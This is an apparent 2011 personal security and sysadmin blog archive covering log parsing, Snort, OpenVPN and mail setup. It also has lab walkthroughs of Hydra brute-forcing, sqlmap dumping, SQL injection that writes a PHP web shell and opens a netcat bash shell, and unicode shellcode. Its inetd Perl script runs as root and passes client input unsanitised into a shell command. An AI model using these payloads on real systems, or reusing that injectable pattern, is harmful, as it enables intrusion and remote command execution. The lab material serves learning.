Monday, December 5, 2011

Helpful log parsing tips

Most programs and services produce logs. When a user visits an apache web server, the service will most likely keep a log of that request, along with the date and requester's ip address. Other details might be logged as well. Here us an example of some entries in a logfile: - - [21/Sep/2011:11:04:40 +1000] "GET / HTTP/1.0" 200 468 - - [21/Sep/2011:11:07:48 +1000] "GET /login.php HTTP/1.0" 200 6433

Log files would usually contain hundreds of such entries, most, if not all of which are important to us. If there is an issue with a service, perhaps there is an entry in the logfile that can tell us why. Another scenario is where management require some statistical information. For example, how many unique IP addresses visited their website in the past hour and what pages did they visit. Or which web pages are the most frequently visited.

If you look around on the web, you will be able to find tools that would retrieve most of this information for you. However, some of these tools may not have the functionality built in to retrieve all the data you require. Hence, knowing how to do things yourself might come in handy.

Here are some examples. I used the following log entries in my examples. - - [21/Sep/2011:11:04:40 -0500] "GET / HTTP/1.0" 200 6443 - - [21/Sep/2011:11:07:48 -0500] "GET /logo.gif HTTP/1.0" 200 4006 - - [21/Sep/2011:11:08:40 -0500] "GET /forum.php HTTP/1.0" 200 468 - - [21/Sep/2011:11:08:48 -0500] "GET /sports.php HTTP/1.0" 200 98002 - - [21/Sep/2011:11:09:42 -0500] "GET /basketball.htm HTTP/1.0" 200 45869 - - [21/Sep/2011:11:09:48 -0500] "POST /login.php HTTP/1.0" 404 501 - - [21/Sep/2011:11:09:50 -0500] "POST /login.php HTTP/1.0" 404 501 - - [21/Sep/2011:11:09:55 -0500] "GET / HTTP/1.0" 200 6433

We can parse the unique IP addresses that visited our apache website. We can take this step further and sort these IP address by the one with the most requests. This will give you an idea of which IP address chatted the most with the server and which ones were least talkative.

awk '{print $1}' access.log | sort | uniq -c | sort -nr

We can generate statistics based on HTTP status codes. From there, you can see how many successful requests were made, as well as how many bad requests were made for non-existent pages or files. Based on our example log entries above, we should get 6 successful requests and 2 "file not found" requests.

awk '{print $9}' access.log| sort | uniq -c | sort -rn

To see only the log entries that genereated the HTTP status code of 404 or "file not found" requests.

awk '$9 == "404"' access.log

Continuing from the last example, if we only wanted to see the IP address and the request that was made that triggered the 404 status code:

awk '$9 == "404"{print $1, $7}'

Lets take the last example a little further. Say management wanted to know the number of requests that resulted in a "404" status code between 11 AM to 12 PM on 21/Sep/2011.

awk '$9 == "404"' access.log | egrep "21\/Sep\/2011" | awk 'substr($4,14,2) == "11"'

Lastly, if you want to check how many bytes your server has served up for a particular day, awk and grep can help us agian. The number after the status code in the log entries is the size (in bytes) of the object returned to the client from the request.
In my example, I omit the entries with status code "304". I do this because an intelligent user agent (browser) may already have the object in its cache. A 304 indicates that the cached version has the same timestamp as the 'live' version of the file so they don't need to download it. If the 'live' file was newer then the response would instead be a 200.

egrep "21\/Sep\/2011" | access.log | awk '$9 != "304"{sum+=$10}END{print sum}'
The result of this is in bytes. To convert to kilobytes and or megabytes, the print statement at the end would be {print sum/1024/1024}.

Its important to know that these techniques are not limited to only apache log files. Any log file can be parsed using the combination of grep, awk, sort, uniq and even sed (sed can be used to clean up the output). Under linux systems, the log files at /var/log can be parsed in a similar fashion with slight modifications to the parameters passed to the programs. If you wanna get fancy, you can output the data to a text file and run a php script that reads this file and outputs a nicely formatted HTML report page.

Resources / Good Reading:

status codes

Wednesday, November 9, 2011

Snort gets a little help from swatch

Wanna know who is attacking your network and be notified ASAP? Maybe this setup might help you. Snort is a well developed open source IDS/IPS (intrusion detection/prevention system). An IDS is basically a sniffer (like tcpdump, wireshark, etc.) that looks at all the packets on the network and keeps an eye out for only interesting information. When it sees information that might be of interest (like a tcp port scan), it will log the packets pertaining to the port scan. An IDS will only log these packets, but doesn't take the extra steps to prevent the network attack from happening. An IPS will take the role of the IDS one step farther and has the ability to perform other actions in addition to logging. These might include blocking ports, setting firewall rules to block traffic based on port or ip address, etc.

Lets start using snort.

Snort can be used as a regular sniffer, like tcpdump. See the commands below:
# snort -dev -i eth0

To log the packets to a file, use the -l switch and specify a directory. Snort will create the file for you.
# snort -dev -i eth0 -l /root/snort/

Depending on your defaults, snort may log in Ascii mode or pcap mode. You can use the -K switch to specify (ascii, pcap or none).
# snort -K Ascii -dev -i eth0 -l /root/snort

To log packets in tcpdump format you can use the -b only.
# snort -b -dev -i eth0 -l /root/snort

Using snort as an IDS

This is accomplished by specifying a config file on the command line.
# snort -c snort.conf -i eth0

I always like to use -A for alert mode. Basically a file gets created called alerts, and when bad traffic is seen on the network, snort will make a note of it in this alert file. There are a few options for these, but i like using the fast option (see man snort for more details). Note that two files are created, the alert file and the snort.log file. The alert file will contain syslog like log entires when an attach happens and the snort log file will contain the bad traffic data(in tcpdump format if thats the option you went with) that triggered the alerts.
# snort -A fast -c snort.conf -i eth0

The snort.conf file is well doucmented and easy to configue. Here is a very barebones config file example.

var HOME_NET any
var AIM_SERVERS [,,,,,,,,]

include /etc/snort/classification.config

include $RULE_PATH/icmp.rules

The above example snort.conf will look for bad icmp traffic. If you ping your loopback interface, snort will generate some alerts and start logging this traffic.

How swatch can help you.

I blogged about swatch already so you can refer to my posting on that. Swatch can be used to monitor a snort alert file and be configured to send an email to you when a specific alert gets triggered. See the video below for a demonstration.

combining snort and swatch from aerokid240 on Vimeo.

One issue that will arise is that you may start recieving multiple emails. For example, if 4 ping packets were sent from the loopback address, then 4 alerts should be triggered by snort. Therefore, when swatch is notified about these alerts, 4 emails would be sent instead of just one. So if snort sets the same alert 100 times, you can expect 100 emails in this setup. I'm sure you can set swatch to run a script that would overcome this problem, but that is beyond what i wanted to demonstrate in this post.

Resources/Good Reading:

Tuesday, November 8, 2011

Uncloaking the unprotected with DirBuster

The following two paragraphs were taken from on DirBuster.

DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.

However tools of this nature are often as only good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from scratch, by crawling the Internet and collecting the directory and files that are actually used by developers! DirBuster comes a total of 9 different lists (Further information can be found below), this makes DirBuster extremely effective at finding those hidden files and directories. And if that was not enough DirBuster also has the option to perform a pure brute force, which leaves the hidden directories and files nowhere to hide! If you have the time ;)

Here is a video that i've created illustrating one of the ways DirBuster can be used and why its very important to take the necessary steps to secure your data, rather than just hiding it. Because the webmaster didn't properly configure his webserver for security, it was possible to gain access to some data.

Dirbuster from aerokid240 on Vimeo.

Resources / Good Reading:

Saturday, November 5, 2011

Brute forcing html login forms

Lately, i been really busy at work and havent researched or read any books in the past two weeks. Already i felt like my brain was slipping away. So i decided to fire up a DVL (Damn Vulnerable linux), which is a live distribution that has many vulnerabilities for one to practice their security skills. I haven't used it before so i didn't know what i was getting into. I did a port scan and found two open ports (631 and 3306/mysql). Initially, i tried to identify the MySQL version using metasploit but that didn't work. I then tried using the metasploit mysql bruteforcer, to do a dictionary attack on the service, but metasploit complained that the attack will only work on older versions of MySQL. I was clueless. I began looking around the DVL and then started apache (isn't running by default) from the desktop shortcuts. I went back to my attacking backtrack 5 machine and fired up Firefox then went to the relevant webpage URL for the DVL machine. Interesting enough, it gave me a directory listing. I saw phpmyadmin listed so i decided to go in their. I was presented with the login page. I tried some random stuff i thought might work and had no success. I was failing miserably. What i needed to do at that point was automate the password guessing process. This is where hydra comes in.

This is the code i used.
# hydra -l admin -P passwords.lst -e ns -vV http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:denied"

After a few minutes, i had a smile on my face. Hydra found two usable passwords for the username admin. Just to avoid any spoilers, i wouldn't post the relevant passwords. Out of curiosuty, i decided to run hydra again for the user root.

# hydra -l root -P passwords.lst -f -e ns -vV http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1:denied"

I decided to use the "-f" switch so hydra would quit immediately when a matching password is found. Indeed, after a few seconds, i had a usable password. In reality, there is nothing to fancy about this as the accounts and their passwords seem to be at their defaults and if you knew what mysql accounts default credentials are, then you know that bruteforcing here was a dead waste of time :). Either way, i had a foot in the door and the point of this was to demonstrate how you can bruteforce html login forms with hydra.

BTW, adding the "-U" switch would give you usage information when using the "http-post-form" service.

Update: It turns out that you can use any username with the password of "0" for some reason :). Now that you have access, to the mysql database, you can snoop around to get information and user logins for web apps like wordpress and joomla.

Resources/Good Reading:

Monday, September 19, 2011

Mail Serving with Postfix and dovecot

There are tons of great documentation out there showing you how to set this SMTP server up. Postfix is very popular and a great alternative to the even more popular sendmail. Here are some good resources that i used to learn how to set this up:

Ubuntu postifx documenation
Postfix virtual mailbox setup
Centos postfix setup
Centos postfix restrictions

Setting up dovecot is simple enough. Check out the following resources:
Ubuntu dovecot configuration virtual users virtual users example authentication/password schemes
Integrating dovecot SASL with postfix cram-md5 howto

Postifx/dovecot mail system can make use of actual system users or virtual users. With system users, you would have to create a new system users (eg, adduser mark) for each user. I don't really want to have to create a new system user everytime to add a new mail user. Using virtual users with virtual mailboxes suites my installations better (more personal preference). The key thing to remember is that you would have to make changes to both postfix and dovecot configutations to get this to work. In postfix, the key settings that need to be modified can be seen here. In dovecot, this example will show you how to setup the virtual user accounts for SASL login authentication.

Wednesday, August 31, 2011

File Backups with logrotate

Logrotate is a log rotating program, that usually gets executed daily by a cron job. It has a main configuration file located at "/etc/logrotate.conf" and additional configs are usually store in the directory located at "/etc/lofrotate.d". The options in the configuration file are dead simple to understand and can be learned from its manpage (man logrotate). Logrotate is mainly used to backup and rotate log files but can be used on any file.
The following example will show how to back up contents of the /var/www folder.

First thing we will do is create a directory to house our configuration file and the backups. We will do this in our home directory at "/home/user".

# mkdir backups
# cd /home/user/backups

We then create the config file named rotate.conf:

### logrotate config file
rotate 4
rm /home/user/backups/www.tar
tar -cf /home/user/backups/www.tar /var/www

A quick run down of the config options:
-The first line gives the path to the file we want to backup and rotate
-Rotate 4 will keep up to 4 backups and rotate onwards
-daily is set to have log files rotated daily
-Compress will use gzip to compress the file by default
-copy just makes a copy of the original file for backup
-The prerotate directive allows us to run commands before rotating the logs. The commands i used should be straight forward enough to understand, but anything can go here. You must end the prerotate directive with endscript.

In our setup, logrotate will need a dummy file called www.tar to start off properly, so we will create an empty file with that name:

# touch www.tar

Thats it for the configuration. Now to run logrotate issue the following:

# logrotate -f /home/user/rotate.conf

the "-f" option tells logrotate to force the rotation.

Running this command a few times (7-8) will basically cause several backups to be created and rotated as need be. You would eventually notice that only 4 backups are being kept as per our configuration.

Resouces/Good Reading:

Friday, August 26, 2011

Tips on securing apache webserver

I came across a nice article at that i wanted to share. It was very useful to me and i'm sure it will be to someone else as well. I've read other articles on the topic but i found that this one does the best job in explaining why certain options were used and their benefits. If you have an apache server out there and you're skeptical about its security, then maybe reading this article might put some things into perspective for you and set you on the right path.

Link: Securing Apache

Sunday, August 7, 2011

Automating sql injection with Sqlmap

Sqlmap is an automated sql injection tool written in python. More information can be found at this link.

sqlmap from aerokid240 on Vimeo.

Commands used.

sqlmap -u '' -p 'id' --dbs

sqlmap -u '' -p 'id' -D exploit --tables

sqlmap -u '' -p 'id' -D exploit -T members --columns

sqlmap -u '' -p 'id' -D exploit -T members -C username --dump

sqlmap -u '' -p 'id' -D exploit -T members -C password --dump

Sqlmap options used:
-u Target url
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate

Resources/Good Reading:

Tuesday, August 2, 2011

From SQL injection to Shell

For months and months i avoided this topic. I always assumed that this injection technique was minor and not high risk. So what if you loose email addresses and phone numbers, this stuff is pretty much public knowledge anyways right?(Google your email address and don't be too surprised by the result). Of course, at the time i knew absolutely nothing about sql injection and i was basing this on pure assumption. Well now that I've taken a good week to learn as much as i can about the topic i must say that i was overwhelmed by what can be accomplished by this attack. Trust me when i say that writing exploits for windows executables is cool and amazing. Sql injection doesn't fall short of coolness either and i would like to demonstrate this. This demonstration should give you an idea of what this attack is and why it is EXTREMELY dangerous.

Note: This is not a tutorial. Background knowledge of sql injection is required to follow. I recommend reading here or check some of the other resources at the end of the post to get a grasp of some of the concepts.

The vulnerable app i would be using here is a php website with a MySQL back-end. You can get the download here. It is know as i believe.


1. Extract the tar.gz file to your web root directory

2. Set up a new database either using CLI or phpMyAdmin and import the "exploit.sql" database

3. You will need to edit the database connection string which is located in a file named"config.php" in your web root folder and "config.php" in webroot/admin/ folderEdit this config file with your sql server address,user name,password and database name.Thats all, Now just browse to "localhost" or to see the web site.

Assuming the website is up and running, we will test for the vulnerability on the newspage.php page. On the homepage click on one of the articles under the "latest news" section. Note the URL on the address bar "" (note your id=value , parameter may differ based on your selection).

Now add a " ' " at the end of the URL; "' ".
Notice that nothing fancy really happens. Typically, you would get a database syntax error message somewhere on the page, but the programmer of the website took the extra step to prevent this. This type of sql injection attack is usually classified as blind sql injection.

lets try to add a mysql comment character, "#", to the url; "'#"
Nothing happened here.

Lets url encode the "#". This becomes "%23".
Ah this here completed the query. You would notice this as the page returned information pertaining to this id number. This is a sign of the existence of an sql injection vulnerability. You can visualize the query being something like " select * from news where id='1' ". With our inject data, the query would look like this " select * from news where id='1' #' ". The %23 in the url was converted to "#", the comment symbol in mysql.

The following are steps that i took to enumerate information from the database. I would be manipulating the id= parameter in the url from now on.

  1. Obtain the number of columns from the query. id=1' order by x %23 . Where x is the number of columns. Start with 1, then increment this number until the page returned is no longer valid. I learned that the number of columns returned by the query is 7
  2. Determine where and what columns are displayed on the page. id=x' union all select 1,2,3,4,5,6,7 %23. You would notice that the third and seventh column are returned. We will use the 7th column to enumerate database information.
  3. Enumerate the database name. id=x' union all select 1,2,3,4,5,6,database() %23. Database is exploit.
  4. Enumerate the current user. id=x' union all select 1,2,3,4,5,6,current_user() %23. Current user is root :)
  5. Enumerate the tables. id=x' union all select 1,2,3,4,5,6,table_name from information_schema.tables where table_schema=database() limit x,1%23. Where x is like an index to the table number. Limit 0,1 will return the first table, limit 1,1 will return the second table, limit 2,1 will return the third table and so forth.
  6. Enumerate the columns. id=x' union all select 1,2,3,4,5,6,column_name from information_schema.columns where table_schema =database() and table_name='x' limit y,1. Where x is a table name that was obtained from step 5 and y is an integer index as discussed above when used with limit.
  7. Now we can enumerate the data. We will enumerate the members table. The members table has three columns, id, username and password. We will get the usernames and their respective passwords. id=x' union all select 1,2,username,4,5,6,password from members limit x,1%23. Where x is used as an integer index value to the results of the query. You would soon notice that passwords are stored in plain text.
  8. Reading files. id=x' union all select 1,2,3,4,5,6,load_file('/etc/passwd')%23. This will display the contents of the file /etc/passwd.
  9. Lets drop a simple backdoor shell. This would only work where there is a directory with write permissions. Assuming /var/www/ has write permision by everyone we can create our backdoor php shell like this.
    id=x' union all select 1,2,3,4,5,6,'<?php system($_GET[cmd]); ?>' into outfile '/var/www/shell.php' %23
    If all went well, using your browser, goto This should list the current directory contents via the "ls" UNIX command.
  10. Lets get a more interactive shell. Using the same shell.php script we wrote to the database server goto -e /bin/bash -lvp 4444. This sets up a netcat backdoor.
Update: Here is a video demonstration on how most of this is done.

sql injection from aerokid240 on Vimeo.

Resources/Good Reading:
wikipedia vuln web site

Wednesday, June 29, 2011

Challenges in developing unicode exploits

In a precious post, i wrote about exploiting a stack buffer overflow for the vulnerable version of minishare (version 1.4.1). This was basically my interpretation and understanding of lupin's write up of the same exploit in tutorial form over here. If you need more elaboration on the exploit writing process, i suggest that you look at his tutorial on exploiting minishare (there are other tutorials as well). There is also a good tutorial at on writing exploits. It was the tutorials over at corelan that got me into unicode exploits. This is a very length tutorial on unicode exploits that made me really understand the challenges in writing such an exploit.

Unicode exploits are basically the same as traditional stack buffer overflow exploits but it comes with a bigger challenge. The idea between both exploit types are the same; Overwrite EIP (or seh) with a useful address that would execute a command that jumps us back to our buffer that contains our code. Although their goals are the same, how you would go about achieving these goals differ.

The differnce that you would notice from the traditional ascii exploit and a unicode one is that every byte is appended with a null or 0x00 byte. For example, the string "DOG" in uppercase will be "44 4F 47" in ascii bytes. The unicode representation of the same string will be " 44 00 4F 00 47 00". So if when you overwrite a buffer with a crap load of AAAAAAAAA's, in a unicode exploit, each A in the buffer will be appened with a null. Therefore your buffer will look like this in bytes: "41 00 41 00 41 00 41 00 41 00 ...".

Usually with unicode exploits, you are quite limited in what memory addresses you can overwrite EIP or SEH with and you also have a limed instruction set in which you can use. You must accept that every byte in your supplied buffer will contain a trailing null byte and work your way from there. This also means that your buffer must contain code thats unicode compatible. For example, putting a short jump where the next seh address resides, i.e jmp 0x6, is common in seh exploits to jump over seh address towards your shellcode. This jmp 0x6 in bytes is " eb 06". If when send this in our buffer, the nulls will be appeneded to each byte before the code is run, i.e "eb 00 06 00" . If you look at the instructions that these bytes represents, its not what you would've intended it to be. This is a major point that must be kept in mind when dealing with unicode exploits.

You must be wondering how do we overcome the limitations discussed earlier. You basically use unicode compatible instructions to accomplish the same thing. These instructions include single byte instructions like push, pop, inc, dec and ret just to name a few. When using single byte instructions, each instruction must be seperated by some nop-equivalent code in the form of "00 nn 00" where nn will be an opcode that will give the effect of a nop instruction. There are not too many opcodes that we can use here. Some of them are 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x62 and 0x6D. These opcodes when used in the format "00 nn 00" will produce assembly instrunctions like "add byte ptr [ebp], ch". Replacing nn with one of the opcode bytes would produce something similar. For this to work however, the relevant register (ebp in our example) must contain an address which is writeable or else an exception will occur. Each opcode byte will normally result in giving you a different register at your disposal. Because the code that this produces probly would not affect our buffer (or shellcode), it can be used as filler or nop-like code in between single byte instructions and other relevant code pieces. If you need further elaboration of the uses on this, please read the unicode exploit over at They did a great job explaining this, but most importantly, they also walk you through developing an exploit using the above mentioned techniques.

Some things to keep in mind.
  1. After you found that you can overwrite eip or seh, you will need to find a usable unicode compatible address, i.e, in the form of 00nn00nn. So in the case of an seh exploit, you gonna need to find an address to a pop pop ret (like in a typical seh exploit) but this address must be in the format of 0x00nn00nn. The pvefindaddr plugging for immunity debugger can automate this process.
  2. Make use of single byte instructions like push, pop, inc, dec, and ret and seperate each with one of the nop-like opcodes i mentioned earlier (0x6D, 0x6E, 0x6F, 0x70, 0x71 etc. This will cause opcode to align itself in a way that is unicode compatible.
  3. Shellcode must be encoded with unicode compatible encoder. You can also use metasploit for this: # msfpayload windows/exec CMD=clac.exe R | msfencode -e x86/alpha_mixed -t raw | msfencode -e x86/unicode_upper -t raw BufferRegister=EAX
  4. Unicode encoders usually need you to have at least one register pointing to the begining of the shellcode. Here is an example of how this can be accomplished. Suppose we wanted to get the address of 0x00401030 into eax then jump to it. We can accomplish this like so:
Opcode: Assembly:

B8 00110011 MOV EAX,11001100
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
2D 00010011 SUB EAX,11000100
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
05 00300040 ADD EAX,40003000
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code
006D 00 ADD BYTE PTR SS:[EBP],CH //Filler / Nop-like code

If we were to see this as a stream of bytes, it would look like "B8 00 11 00 11 00 6D 00 2D 00 01 00 11 00 6D 00 50 00 6D 00 4C 00 6D 00 58 00 6D 00 05 00 30 00 40 00 6D
00 50 00 6D 00 44 00 6D 00 58 00 6D 00 C3"

This is unicode compatible code, often known as venetian code. Remember when you are writing your exploit, you will not be including the null bytes. These would get automatically inserted for you when your exploit overflows the buffer.

Saturday, June 4, 2011

Automate log monitoring and get email notifications with swatch

The swatch program (simple watcher) can monitor all sorts of logs and respond to certain events when they occur. Its concept is quite simple. Swatch will monitor a logfile for us , for example, /var/log/syslog, and when a specific event occurs (these events are configured in the swatch config file) and are logged in the log file, swatch can respond by executing a program, sending an email to a sysadmin or sending messages to the console where swatch is being run.

A simple example of swatch in action. If you are the sole sysadmin of a webserver, you would probly want to be notified if someone attempts to try to log into your server (could be over ssh or other authentication services). Being the sole admin of the webserver, no one else should have any business being on the system. Anyone but the admin attempting to login to the system obviously doesn't belong there and may have bad intentions. In this case, you can set up swatch to monitor the auth.log file for failed logon attempts and succesful logon attempts and then send you an email whenever their is attempts from anyone to log in. Of course this will notify you even when you log on to the machine, therefore this might be more practical if you have an unattended system (maybe you are on vacation or away on business).

I use an email program which is actually a perl script, called sendemail. On a debian based system, you can install it via apt-get install sendemail. Likewise, to install swatch, apt-get install swatch. Once both are installed, a simple configuration for swatch is as follows

watchfor /sshd/
echo bold
bell 3
exec "/usr/bin/sendemail -s -f -xu -xp your_hotmail_pass -u "Log alert" -m "Possible SSHD login attemp" -t -s"

Save the above to a text file with an appropriate name such as swatch.conf

Then we can execute swatch like this:
# swatch --config-file=/path/to/swatch.conf --script-dir=/path/to/your_config_dir --examine=/var/log/auth.log

Whenever someone attempts to login to your sshd server, the sshd daemon will log the login attemp in /var/log/auth.log. The swatch program will monitor the auth.log file for the string sshd and whenever it gets a match, it will leave a notification on the console and then send an email to The swatch program understands regex expressions so you can perform more advanced matches instead of a simple string like sshd.

Tuesday, May 31, 2011

OpenVPN Cont. - Adding username/password authentication to openvpn

This post basically adds onto the steps outlined in the previous post. By adding username/password authentication, you are essentially providing a two factor authentication mechanism to your openvpn server. The client would need a usable client certificate and key to authenticate itself to the server, as well as provide a valid username and password.

We have already discussed using certifcate authentication in the previous post so i wont be going over that here. To add the user/pass mechanism we would be adding to our already existing configuration files one or two lines.

In the server config file, add the following:
plugin /usr/lib/openvpn/ system-auth

On the server create a group called vpn
# groupadd vpn

Then we can create each user:
# useradd -s /bin/false -g vpn vpntest // this creates the user and puts them in the vpn group
# passwd vpntest // gives the user vpntest a password for authentication

On the client config file, add the following:

Thats it. Keep in mind that we were adding to our config files from the previous post, so it is presumed that you already have a working openvpn server that accepts client key/certificate authentication

Resources/Good Reading:

Saturday, May 28, 2011

OpenVPN configs made easy

If you are reading this, i'm assuming that you would already know what a VPN is. If you are not familiar with the term, you can read this Wikipedia entry to get up to speed with the technology.
This guide would not be a full featured guide on how to setup the "complicated" openvpn software. For quite sometime now, i have avoided Openvpn as i've always read about how hard it is to setup up and configure. I've used other VPN technologies such as hamachi and adito. While these solutions are great, i've always felt like i was holding myself back by not giving Openvpn a chance. After following some tutorials, some quite simple and others very complex, i am happy to say that i've finally set up Openvpn server. The best thing that i have taken from this experience is that its not all that hard to set up. There are guides out there that seem very intimidating on the topic and my hope is to try and take this confusion away and give you the quick 101 of openvpn.

---+++Using openvpn with secret key.+++---

I've used Backtrack 5 to setup my server (you can use other linux distros as well)

  1. Install Openvpn. Backrack 5 already comes with it pre-installed. If your distro didn't come with it already install, you can install by issuing # apt-get install openvpn (applicable for debian based systems that use apt for managing packages)
  2. Navigate to openvpns config dir. # cd /etc/openvp
  3. Create a secret key. # openvpn --genkey --secret secret.key
  4. By default no config file is available. Lets create one. # touch openvpn.conf
  5. Using your favorite text editor, open up the config file that you've just created and enter in the following:
proto udp # protocol to use. Either tcp or udp
port 1194 # port num
dev tun # can be either tun or tap. Tun is simpler to sertup
ifconfig # The is the desired IP for our server's virtual interface and the other is the peer
secret /etc/openvpn/secret.key # secret key used for authentication
cipher AES-128-CBC # encryption cipher to use
user nobody # drop priveledges to this user
group nobody # same as above
verb 3 # logging level
Thats it for the server set up. Now copy the secret.key file and the openvpn.conf file to another linux client that already has openvpn installed. Note that the server and client config files are almost identical with few minor changes. Copy the files to the location /home/user/.openvpn (this location is not mandatory but lets just be organized).

  1. First change permissions of config and secret key file. # chmod 644 secret.txt ; chmod 644 openvpn.conf
  2. We need to add 1 line to the openvpn.conf file and modify the ifconfig parameter. So the client's openvpn.conf file will look like this
remote # VPN's server's real ip
proto udp

port 1194
dev tun
ifconfig # notice the change here
secret /home/user/.openvpn/secret.key
cipher AES-128-CBC
user nobody
group nobody
verb 3
Thats all for the client configurati0n.

Starting the server and client take identical commands and require root privileges. Onceyou are root, you can start the server and client like so: # openvpn --config /etc/openvpn/openvpn.conf

Once the connection is established both the server and client terminal windows should give some details similar to this:

Sat May 28 20:53:16 2011 Initialization Sequence Completed

To test your VPN connection, you can use the ping utility.

---+++Using openvpn with certificates.+++---

Server setup:
  1. Copy scripts for handling certificates to /etc/openvpn directory. # cp -r /usr/share/doc/openvpn/examples/easy-rsa /etc/openvpn
  2. Goto scripts dir. # cd /etc/openvpn/easy-rsa/2.0
  3. Modify the "vars" file. The variables that you want to modify are at the bottom of the file. These include KEY_COUNTRY, KEY_PROVINCE etc.
  4. After modifying the vars file, issue this command on the file. # source ./vars
  5. Clean up older keys. # ./clean-all
  6. Create CA key and certificate. # ./build-ca
  7. Create the openvpn server's certifcate and key. # ./build-key-server openvpn_server
  8. Create client keys and certificates. # ./build-key client1
  9. Create dh key. # ./build-dh # this can take a 2-4 mins to create. Move your mouse around an be patient :)
  10. Goto keys directory. # cd keys
  11. Copy the dh1024.pem, ca.crt, openvpn_server.crt and the openvpn_server.key files to /etc/openvpn/ directory
  12. Lets create our server config file:
tls-server # this would be the server in tls mode
proto udp
# protocol to use. Either tcp or udp
port 1194 # port num
dev tun # can be either tun or tap. Tun is simpler to sertup
ifconfig # The is the desired IP for our server's virtual interface and the other is the peer

ca /etc/openvpn/ca.crt
cert /etc/openvpn/openvpn_server.crt
key etc/openvpn/openvpn_server.key
dh etc/openvpn/dh1024.pem

cipher AES-128-CBC # encryption cipher to use

user nobody # drop priveledges to this user
group nobody # same as above
verb 3 # logging level
Client setup:

  1. Copy the ca.crt, client1.crt and the client1.key files to the client
  2. Create its config file:

tls-client # this would act as client in tls mode
remote # VPN's server's real ip
proto udp

port 1194
dev tun
ifconfig # notice the change here

ca /home/user/.openvpn/ca.crt
cert /home/user/.openvpn/client1.crt
key /home/user/.openvpn/client.key

cipher AES-128-CBC
user nobody
group nobody
verb 3
Again, starting the server and client take the same commands but you must have root privileges. Once you are root, you can start the server and client like so: # openvpn --config /etc/openvpn/openvpn.conf

Once the connection is established both the server and client terminal windows should give some details similar to this:

Sat May 28 20:53:16 2011 Initialization Sequence Completed

To test your VPN connection, you can use the ping utility and ping each node.


If you want revoke client keys:
# ./revoke-full client1

This would add client1 to a sort of black list that would not allow them to connect to our VPN anymore. The file that houses this black list is crl.pem. Create a hardlink (ln without the -s option)to this file in the /etc/openvpn/ directory.

You would also need to add this line to the configuration file on the server. This causes the server to check its revocation list whenever clients try to establish a connection to the VPN server.

crl-verify /etc/openvpn/crl.pem

I noticed that when a revoked client tried to connect to the vpn, not only were they denied service, the VPN server was also shutting down. It seems like the when openvpn shuts the connection down, it tries to reinitialize its tun interface, but fails to do so because in our config file, we dropped our priveledges to nobody. This issue is quickly resolved by commenting out or deleting the lines with the parameters user and group on the server config file.

Resources/Good Reading:

Monday, May 23, 2011

Vicompress: http proxy server

Vicompress is an http proxy server, with the ability to cache requests in memory. It has a small footprint but because of its ability to cache contents in memory, it can eventually use up tons of memory resources. It has decent log statistics capabilities too and outputs to an html formatted page. Most important to me, setup and configuration is quite simple.


1 . Download the installation package from visolve website. In my case, i downloaded the .deb version of the package.

2. To install i used the command: # dpkg -i package-name


For details on all configuration parameters, go here

The default configuration would do just fine, but its useful to learn of its parameters
Here is a snapshot of my vicompress.conf configuration file:

listen 8080
enable_compression yes
enable_caching yes
cache_memory 200
max_cacheditem_size 10000
cache_expires 2
enable_dns_caching yes
dns_expires 2
user nobody
rotatesize 10
logformat squid
enable_debug no
accesslog /usr/local/vicompress/log/accesslog
errorlog /usr/local/vicompress/log/errorlog
errorpage /usr/local/vicompress/etc/errorpage.html
logstats /usr/local/vicompress/logstats

To start the server: # /usr/local/vicompress/bin/ start

To view the statistics of your proxy server, usually a report gets generated every hour. You can speed this process by issueing this command:

# cd /usr/local/vicompress
# ./bin/update_log_stats /log/accesslog logstats

To view the report issue: # firefox /usr/local/vicompress/logstats/statsindex.html

Resources / Goodreading:

Saturday, May 14, 2011

Inetd and perl

Just a quick simple trick that you can help you set up servers quick and easy. You don't have to know alot about programming either but it helps to know what Inetd is in linux.

Inetd, on its manpages is known as a internet superserver. All those big words aside, it can basically listen on a given port for you and when a connection comes in, it calls the appropriate application to handle them. It so turns out that you can use Inetd's sockets for network communication instead of programming your own. What that means is that inetd can listen on port 80, and when a connection comes in on that port, we can run a shell script that simply sends back some text or html tags. Inetd's output is piped to the calling program or script's standard input and that program's output is redirected to Inetd's standard input.

Lets quickly demonstrate this with a bash script.

echo "Hello World"

Now save that script to a file called and give the file executable permissions.
# chmod 555

Now configure /etc/inetd.conf as follows

http-alt stream tcp4 nowait root /root/

Now save the file.

Run the inetd daemon
# /etc/init.d/inetutils-inetd start

now netcat to port 8080 (which is what http-alt) service is and you should revecieve a response:

root@bt~#: nc 8080
Hello World

All should work well if done right. Now to get a lil bit more fancy, i've put together a perl script that takes an input and returns the MD5 hash of that input (an MD5 hashing service if you will).
#!/usr/bin/perl -w

# A simple inetd socket server.

use strict;

my $old_fh = select(STDOUT);
$| = 1;
print "++ MD5 pass generator ++\n\n";
print "Type \'exit\' at anytime to quit\n";
print "Enter string to be hashed: ";

while( my $line = )
$line =~ s/\r?\n$//;
if ($line =~ /^exit$/)
die "shutting down\n";
# do your processing here!
$line = `echo -n $line | openssl md5`;
print "$line\n";
print "Enter string to be hashed: ";
Save the perl script to a file like and chmod 555 your file.
Start the inetd daemon as shown above and use netcat to connect to the service :)

Backtrack 5 is out

